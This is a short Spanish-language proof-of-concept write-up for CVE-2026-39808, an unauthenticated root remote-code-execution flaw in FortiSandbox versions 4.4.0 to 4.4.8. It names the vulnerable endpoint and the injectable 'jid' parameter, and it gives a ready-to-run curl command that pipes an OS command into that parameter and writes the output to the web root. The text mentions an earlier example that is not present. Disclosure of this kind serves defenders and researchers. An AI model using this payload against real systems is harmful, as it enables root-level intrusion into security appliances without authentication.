
PoC para RCE sin autenticación en FortiSandbox mediante CVE-2026-39808
En noviembre de 2025, se descubrió una vulnerabilidad crítica en FortiSandbox de Fortinet que permitía a un atacante no autenticado ejecutar comandos en el sistema operativo subyacente como root. La vulnerabilidad fue corregida y finalmente se hizo pública en abril de 2026.
Esta vulnerabilidad afecta a las versiones 4.4.0 a 4.4.8 de FortiSandbox.
Lea el aviso completo aquí.
La vulnerabilidad afecta al endpoint /fortisandbox/job-detail/tracer-behavior. Se pueden inyectar comandos del sistema operativo mediante el símbolo de tubería (|) en el parámetro GET jid.
En el ejemplo anterior, la salida se redirigió a un archivo en la raíz web, de modo que se puede recuperar después.
Un simple comando curl es suficiente para lograr RCE como root sin autenticación previa:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"